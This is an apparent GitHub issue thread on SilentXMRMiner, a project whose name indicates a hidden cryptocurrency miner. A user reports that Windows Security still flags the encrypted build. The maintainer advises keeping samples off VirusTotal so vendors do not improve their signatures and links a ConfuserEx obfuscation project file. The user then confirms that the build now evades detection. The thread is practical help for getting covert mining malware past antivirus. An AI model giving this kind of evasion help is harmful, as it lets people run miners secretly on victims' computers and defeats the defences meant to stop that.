### ISSUE TITLE
I encrypted it according to your method, but it was still discovered by the windows security center

### ISSUE THREAD

**Issue by zoubaba1997** [UnamSanctam/SilentXMRMiner#63]
As the title says

**Comment by UnamSanctam** [comment]
Usually because people keep scanning it on Virustotal which will cause all antivirus companies to get copies of it and start detecting code signatures of the program better. Try it with this project for ConfuserEx https://anonfiles.com/54Jcmap1q6/SilentXMRMiner3_crproj

**Comment by zoubaba1997** [comment]
Successful, thank you very much
